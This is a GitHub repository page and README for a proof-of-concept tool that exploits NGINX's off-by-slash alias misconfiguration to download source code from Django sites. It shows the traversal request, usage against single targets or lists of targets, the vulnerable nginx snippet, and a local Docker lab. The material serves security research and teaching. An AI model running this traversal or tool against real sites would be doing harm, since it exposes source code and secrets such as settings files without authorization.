Skip to content
/ offbyslash-django-dumper Public

A proof of concept to dump Django website's source code affected by NGINX's off-by-slash alias directive misconfiguration.

License

MIT license
24 stars 4 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

adamyordan/offbyslash-django-dumper

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
vulnerable-site
vulnerable-site
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
demo.gif
demo.gif
 
 
exploit.py
exploit.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

PoC: Off-by-slash Django Site Dumper

A proof of concept to dump Django website's source code affected by NGINX's off-by-slash alias directive misconfiguration.

Installation

$ git clone https://github.com/adamyordan/offbyslash-django-dumper

$ cd offbyslash-django-dumper

$ pip install -r requirements.txt

Usage

Pass target url as argument

$ python exploit.py --url http://django-site.com/

Or using files containing multiple target urls

$ cat targets.txt
http://django-site.com/
https://other-affected-site.org/
http://cool-website.me/

$ python exploit.py --file targets.txt

The result is available at dump directory

$ tree dump

dump/
└── http-django-site.com-
    ├── api
    │   ├── urls.py
    │   ├── users.py
    │   └── views.py
    ├── common
    │   └── logger.py
    ├── manage.py
    └── app
        ├── __init__.py
        ├── settings.py
        ├── urls.py
        ├── validate.py
        └── wsgi.py

Explanation

This dumper works by using a path traversal vulnerability caused by a misconfiguration when using NGINX to serve static files. Equivalent curl command used by this dumper to dump local files is:

$ curl http://django-site.com/static../manage.py

Affected sites will return a response with status 200 OK and body containing the source code of manage.py file.

This vulnerability is caused by a slight but fatal mistake in Nginx's configuration (Nginx off-by-slash fail / alias traversal) that allow path traversal via misconfigured alias. For example, here is a snippet of affected nginx rule:

location /static {
    alias /home/app/static/;
}

By sending a request to http://django-site.com/static../manage.py, Nginx matches the rule and appends the remainder to destination /home/app/static/../manage.py. Therefore serving the manage.py as static file.

This dumper utilize this vulnerability to automatically crawl the source code of Django sites, inferring available source code files by using static analysis (read: pattern matching!), and (recursively?) expand source codes.

Example Vulnerable Site

An example website is provided in this repository at directory vulnerable-site in Dockerfile format.

$ cd vulnerable-site
$ docker build -t tmp/vulnsite . && docker run --rm -it -p 8000:80 -d tmp/vulnsite


$ cd ..
$ python exploit.py --url http://localhost:8000/

[+] START CRAWLING: http://localhost:8000/
[+] downloading: dump/http-localhost-8000-/manage.py
[+] downloading: dump/http-localhost-8000-/app/settings.py
[+] downloading: dump/http-localhost-8000-/app/wsgi.py
[+] downloading: dump/http-localhost-8000-/app/urls.py
[+] FINISHED: http://localhost:8000/


$ tree dump/
dump/
└── http-localhost-8000-
    ├── app
    │   ├── settings.py
    │   ├── urls.py
    │   └── wsgi.py
    └── manage.py

Reference

About

A proof of concept to dump Django website's source code affected by NGINX's off-by-slash alias directive misconfiguration.

Topics

nginx security django exploit poc vulnerability web-security source-code dumper

Resources

Readme

License

MIT license
Activity

Stars

24 stars

Watchers

2 watching

Forks

4 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages